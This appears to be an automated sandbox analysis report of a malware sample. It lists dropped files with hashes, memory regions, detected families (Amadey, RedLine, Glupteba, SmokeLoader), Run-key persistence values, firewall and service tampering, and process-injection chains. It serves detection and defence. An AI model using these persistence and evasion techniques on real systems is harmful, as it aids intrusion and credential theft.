SHA512 ed0dcd43d8bb8bab253daaf069353d1c720aa13217230d643e2c056089d56753aa4df5ee478833f716e248277c2553e81ae9c21f0f1502fdaf5bbac726d2a0c3

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 aa6f521d78f6e9101a1a99f8bfdfbf08
SHA1 81abd59d8275c1a1d35933f76282b411310323be
SHA256 3d5c0be6aafffa6324a44619131ff8994b0b59856dedf444ced072cae1ebc39d
SHA512 43ce4ad2d8295880ca1560c7a14cff89f2dfa70942d7679faae417f58177f63ae436604bbe914bd8fbbaedfb992ab6da4637af907e2b28696be53843d7ed8153

memory/1952-187-0x0000000001360000-0x0000000001876000-memory.dmp

memory/1952-188-0x00000000733C0000-0x0000000073AAE000-memory.dmp

memory/1872-194-0x00000000733C0000-0x0000000073AAE000-memory.dmp

memory/1700-195-0x0000000000220000-0x0000000000229000-memory.dmp

memory/1700-193-0x00000000023D0000-0x00000000024D0000-memory.dmp

memory/2072-196-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1728-197-0x0000000003F50000-0x0000000004348000-memory.dmp

memory/1728-200-0x0000000003F50000-0x0000000004348000-memory.dmp

memory/2072-199-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2072-201-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1728-202-0x0000000004350000-0x0000000004C3B000-memory.dmp

memory/1728-203-0x0000000000400000-0x000000000266D000-memory.dmp

memory/1952-204-0x0000000000830000-0x0000000000870000-memory.dmp

memory/1952-205-0x0000000000310000-0x0000000000311000-memory.dmp

memory/1204-206-0x0000000002CE0000-0x0000000002CF6000-memory.dmp

memory/2072-207-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1952-211-0x00000000733C0000-0x0000000073AAE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\22A.exe

MD5 21b738f4b6e53e6d210996fa6ba6cc69
SHA1 3421aceeaa8f9f53169ae8af4f50f0d9d2c03f41
SHA256 3b1af64f9747985b3b79a7ce39c6625b43e562227dc2f96758118b2acb3e5e58
SHA512 f766a972fde598399091a82fc8db8d9edd25a9a5f9e5a0568769632091605eeb47bf3b44b69d37d51c1c7ab8be89cd4fb4846a5f06d719db885a35e049f1eb81

memory/2576-219-0x0000000000230000-0x000000000028A000-memory.dmp

memory/1728-217-0x0000000000400000-0x000000000266D000-memory.dmp

memory/1728-222-0x0000000003F50000-0x0000000004348000-memory.dmp

memory/1728-225-0x0000000004350000-0x0000000004C3B000-memory.dmp

memory/2436-224-0x000000013F3D0000-0x000000013F971000-memory.dmp

memory/2576-226-0x0000000000400000-0x000000000046F000-memory.dmp

memory/2540-238-0x0000000003FA0000-0x0000000004398000-memory.dmp

memory/2540-240-0x0000000003FA0000-0x0000000004398000-memory.dmp

memory/1952-241-0x0000000000830000-0x0000000000870000-memory.dmp

memory/2540-246-0x0000000000400000-0x000000000266D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\129F.exe

MD5 109da216e61cf349221bd2455d2170d4
SHA1 ea6983b8581b8bb57e47c8492783256313c19480
SHA256 a94bec1ee46f4a7e50fbccb77c8604c8c32b78a4879d18f923b5fa5e8e80d400
SHA512 460d710c0ffbe612ce5b07ae74abf360ebcf9e88993f2fc4448f31b96005f76f6902453c023477438b676f62de93e1c3e9ba980836c12dc5fc617728a9346e26

memory/2708-248-0x0000000000020000-0x000000000003E000-memory.dmp

memory/2708-250-0x0000000000400000-0x0000000000431000-memory.dmp

memory/2708-253-0x00000000733C0000-0x0000000073AAE000-memory.dmp

memory/1416-257-0x0000000000AB0000-0x0000000000ACE000-memory.dmp

memory/1416-258-0x00000000733C0000-0x0000000073AAE000-memory.dmp

memory/1416-259-0x0000000004850000-0x0000000004890000-memory.dmp

memory/1952-263-0x0000000000550000-0x000000000056C000-memory.dmp

memory/1952-264-0x0000000000550000-0x0000000000565000-memory.dmp

memory/1952-265-0x0000000000550000-0x0000000000565000-memory.dmp

memory/1952-267-0x0000000000550000-0x0000000000565000-memory.dmp

memory/1952-269-0x0000000000550000-0x0000000000565000-memory.dmp

memory/1952-272-0x0000000000550000-0x0000000000565000-memory.dmp

memory/1952-274-0x0000000000550000-0x0000000000565000-memory.dmp

memory/2540-271-0x0000000000400000-0x000000000266D000-memory.dmp

memory/1952-276-0x0000000000550000-0x0000000000565000-memory.dmp

memory/1952-280-0x0000000000550000-0x0000000000565000-memory.dmp

memory/2540-281-0x0000000003FA0000-0x0000000004398000-memory.dmp

memory/1952-284-0x0000000000550000-0x0000000000565000-memory.dmp

memory/1952-287-0x0000000000550000-0x0000000000565000-memory.dmp

memory/1952-289-0x0000000000550000-0x0000000000565000-memory.dmp

memory/1952-291-0x0000000000550000-0x0000000000565000-memory.dmp

memory/1952-293-0x0000000000550000-0x0000000000565000-memory.dmp

memory/1952-295-0x0000000000610000-0x0000000000611000-memory.dmp

memory/1620-298-0x0000000000400000-0x000000000047F000-memory.dmp

memory/1620-297-0x0000000000400000-0x000000000047F000-memory.dmp

memory/1620-299-0x0000000000400000-0x000000000047F000-memory.dmp

memory/1620-305-0x0000000000400000-0x000000000047F000-memory.dmp

memory/1620-308-0x0000000000400000-0x000000000047F000-memory.dmp

memory/1620-310-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2540-315-0x0000000000400000-0x000000000266D000-memory.dmp

memory/1952-316-0x00000000733C0000-0x0000000073AAE000-memory.dmp

memory/1676-318-0x0000000003EE0000-0x00000000042D8000-memory.dmp

memory/2708-319-0x00000000733C0000-0x0000000073AAE000-memory.dmp

memory/1676-320-0x0000000000400000-0x000000000266D000-memory.dmp

memory/1416-321-0x00000000733C0000-0x0000000073AAE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab458A.tmp

MD5 f3441b8572aae8801c04f3060b550443
SHA1 4ef0a35436125d6821831ef36c28ffaf196cda15
SHA256 6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf
SHA512 5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

C:\Users\Admin\AppData\Local\Temp\Tar4669.tmp

MD5 9441737383d21192400eca82fda910ec
SHA1 725e0d606a4fc9ba44aa8ffde65bed15e65367e4
SHA256 bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5
SHA512 7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d36e6db193699f2670539623df89cea2
SHA1 c3151a0d544bd197bd79b1cc83d3b28dddfef9bd
SHA256 da569c03c0431b5a7750b947a7ce4236c43924194741f7489c79713fba0c3daf
SHA512 720e5133dc015d35ba5c2a30687dba2c3313db1b651266874773247f004049cd6720762f59595b18dc112d3cc33a6abc93463eb0f9f78f5cd11f53c0d00f8358

memory/1416-427-0x0000000004850000-0x0000000004890000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d36e6db193699f2670539623df89cea2
SHA1 c3151a0d544bd197bd79b1cc83d3b28dddfef9bd
SHA256 da569c03c0431b5a7750b947a7ce4236c43924194741f7489c79713fba0c3daf
SHA512 720e5133dc015d35ba5c2a30687dba2c3313db1b651266874773247f004049cd6720762f59595b18dc112d3cc33a6abc93463eb0f9f78f5cd11f53c0d00f8358

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 4f3e1a840b98b5da2059ed9d7ad02ef7
SHA1 9ee20c8db37188b3676e5d335a793e29b049a355
SHA256 9f79aa12812a4fbfc44641e46fd69461dda00cf64928c90f2f14cfa8bc30a990
SHA512 8c5c4239a066c78e774501be680b138fd0aa61b3c7caa249ce9264274058e9c39e6a71ec87be61e1e9346157d2885584f5f4c254c545fa936f4ebaec744251de

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9257d7c1a15afa662e5bd6d5d74b27e3
SHA1 35f07833a156b11e4e5552c217d18d6dceac0bd9
SHA256 2b08147ccaed043dbaf5752b6814dc15861636626a6feaaa94cbf2bf368f4182
SHA512 a7d7ce71a5238c6a5583ebd9534c8396334b3c65c8f4ae552208d2894bbf9b369f44e5925756ad01ee13d72984bd2ced2544c456b80255bdf58e39da49a2025a

memory/3048-702-0x0000000000540000-0x0000000000B28000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 1afff8d5352aecef2ecd47ffa02d7f7d
SHA1 8b115b84efdb3a1b87f750d35822b2609e665bef
SHA256 c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512 e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

memory/3048-712-0x0000000000740000-0x0000000000D28000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Kno43F3.tmp

MD5 002d5646771d31d1e7c57990cc020150
SHA1 a28ec731f9106c252f313cca349a68ef94ee3de9
SHA256 1e2e25bf730ff20c89d57aa38f7f34be7690820e8279b20127d0014dd27b743f
SHA512 689e90e7d83eef054a168b98ba2b8d05ab6ff8564e199d4089215ad3fe33440908e687aa9ad7d94468f9f57a4cc19842d53a9cd2f17758bdadf0503df63629c6

C:\Users\Admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico

MD5 da597791be3b6e732f0bc8b20e38ee62
SHA1 1125c45d285c360542027d7554a5c442288974de
SHA256 5b2c34b3c4e8dd898b664dba6c3786e2ff9869eff55d673aa48361f11325ed07
SHA512 d8dc8358727590a1ed74dc70356aedc0499552c2dc0cd4f7a01853dd85ceb3aead5fbdc7c75d7da36db6af2448ce5abdff64cebdca3533ecad953c061a9b338e

memory/1712-753-0x000000001B110000-0x000000001B3F2000-memory.dmp

memory/1712-754-0x0000000002080000-0x0000000002088000-memory.dmp

memory/1712-765-0x000007FEF4CA0000-0x000007FEF563D000-memory.dmp

memory/1712-766-0x00000000027D0000-0x0000000002850000-memory.dmp

memory/1712-768-0x00000000027D0000-0x0000000002850000-memory.dmp

memory/1712-767-0x000007FEF4CA0000-0x000007FEF563D000-memory.dmp

memory/1712-769-0x00000000027D0000-0x0000000002850000-memory.dmp

memory/1676-770-0x0000000003EE0000-0x00000000042D8000-memory.dmp

memory/1712-771-0x00000000027D0000-0x0000000002850000-memory.dmp

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

MD5 a5b509a3fb95cc3c8d89cd39fc2a30fb
SHA1 5aff4266a9c0f2af440f28aa865cebc5ddb9cd5c
SHA256 5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529
SHA512 3cc58d989c461a04f29acbfe03ed05f970b3b3e97e6819962fc5c853f55bce7f7aba0544a712e3a45ee52ab31943c898f6b3684d755b590e3e961ae5ecd1edb9

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

MD5 e913b0d252d36f7c9b71268df4f634fb
SHA1 5ac70d8793712bcd8ede477071146bbb42d3f018
SHA256 4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da
SHA512 3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4

memory/1712-807-0x000007FEF4CA0000-0x000007FEF563D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\H0M6ISDRF0LE37X0K1W0.temp

MD5 ec7f35e5a26eab0ff3d08436ba0707da
SHA1 6afeeb34418e526c7aa94425a26fa54408270b72
SHA256 3955b4dc6a5b1999fca9723445a0b8feebee1c4067cfb712c9a182c1685ec077
SHA512 1145c3a26d94b2841cf209c65ae44f1294ad3b11fa10cb2b325b95f65e853c2de6469452d55af3379d456620310f934f7377a53cc2807254e1ea562887b44c75

memory/2204-816-0x000000001B110000-0x000000001B3F2000-memory.dmp

memory/2204-817-0x0000000001F80000-0x0000000001F88000-memory.dmp

memory/2204-818-0x000007FEF4D10000-0x000007FEF56AD000-memory.dmp

memory/2204-819-0x0000000002690000-0x0000000002710000-memory.dmp

memory/2204-820-0x000007FEF4D10000-0x000007FEF56AD000-memory.dmp

memory/2204-821-0x0000000002690000-0x0000000002710000-memory.dmp

memory/2204-823-0x0000000002690000-0x0000000002710000-memory.dmp

memory/1676-822-0x0000000000400000-0x000000000266D000-memory.dmp

memory/2204-824-0x0000000002690000-0x0000000002710000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp74F4.tmp

MD5 02d2c46697e3714e49f46b680b9a6b83
SHA1 84f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA512 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

C:\Users\Admin\AppData\Local\Temp\tmp7538.tmp

MD5 ffb3fe1240662078b37c24fb150a0b08
SHA1 c3bd03fbef4292f607e4434cdf2003b4043a2771
SHA256 580dc431acaa3e464c04ffdc1182a0c8498ac28275acb5a823ede8665a3cb614
SHA512 6f881a017120920a1dff8080ca477254930964682fc8dc32ab18d7f6b0318d904770ecc3f78fafc6741ef1e19296f5b0e8f8f7ab66a2d8ed2eb22a5efacaeda5

memory/2204-885-0x000007FEF4D10000-0x000007FEF56AD000-memory.dmp

C:\Program Files\Google\Chrome\updater.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

memory/1416-893-0x00000000733C0000-0x0000000073AAE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

MD5 fd2727132edd0b59fa33733daa11d9ef
SHA1 63e36198d90c4c2b9b09dd6786b82aba5f03d29a
SHA256 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e
SHA512 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e

C:\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 e2f68dc7fbd6e0bf031ca3809a739346
SHA1 9c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256 b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA512 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

MD5 5da3a881ef991e8010deed799f1a5aaf
SHA1 fea1acea7ed96d7c9788783781e90a2ea48c1a53
SHA256 f18fdb9e03546bfb98397bcb8378b505eaf4ac061749229a7ee92a1c3cf156e4
SHA512 24fbcb5353a3d51ee01f1de1bbb965f9e40e0d00e52c42713d446f12edceeb8d08b086a8687a6188decaa8f256899e24a06c424d8d73adaad910149a9c45ef09

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\27V93E5X\suggestions[1].en-US

MD5 5a34cb996293fde2cb7a4ac89587393a
SHA1 3c96c993500690d1a77873cd62bc639b3a10653f
SHA256 c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512 e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

Analysis: behavioral2

Detonation Overview

Submitted

2023-10-10 20:31

Reported

2023-10-10 20:47

Platform

win10v2004-20230915-en

Max time kernel

86s

Max time network

131s

Command Line

"C:\Users\Admin\AppData\Local\Temp\19a6a588083633421ed63b0f889a6adfc7496bb4b02a23f9044678b1537df4b1.exe"

Signatures

Amadey

trojan amadey

Detect Mystic stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Healer

dropper healer

Mystic

stealer mystic

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\BE31.bat N/A
Key value queried \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\C384.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\19a6a588083633421ed63b0f889a6adfc7496bb4b02a23f9044678b1537df4b1.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\BB41.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WU8aU7xW.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sh6hE7ZX.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Ly3QD9BA.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Hq4pv4zr.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\C1DD.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1600 wrote to memory of 3564 N/A C:\Users\Admin\AppData\Local\Temp\19a6a588083633421ed63b0f889a6adfc7496bb4b02a23f9044678b1537df4b1.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe
PID 1600 wrote to memory of 3564 N/A C:\Users\Admin\AppData\Local\Temp\19a6a588083633421ed63b0f889a6adfc7496bb4b02a23f9044678b1537df4b1.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe
PID 1600 wrote to memory of 3564 N/A C:\Users\Admin\AppData\Local\Temp\19a6a588083633421ed63b0f889a6adfc7496bb4b02a23f9044678b1537df4b1.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe
PID 3564 wrote to memory of 3716 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe
PID 3564 wrote to memory of 3716 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe
PID 3564 wrote to memory of 3716 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe
PID 3716 wrote to memory of 3800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3716 wrote to memory of 3800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3716 wrote to memory of 3800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3716 wrote to memory of 3800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3716 wrote to memory of 3800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3716 wrote to memory of 3800 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a2851806.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3564 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5052593.exe
PID 3564 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5052593.exe
PID 3564 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v3917847.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5052593.exe
PID 2092 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5052593.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2092 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5052593.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2092 wrote to memory of 1260 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5052593.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2092 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5052593.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2092 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5052593.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2092 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5052593.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2092 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5052593.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2092 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5052593.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2092 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5052593.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2092 wrote to memory of 4708 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5052593.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
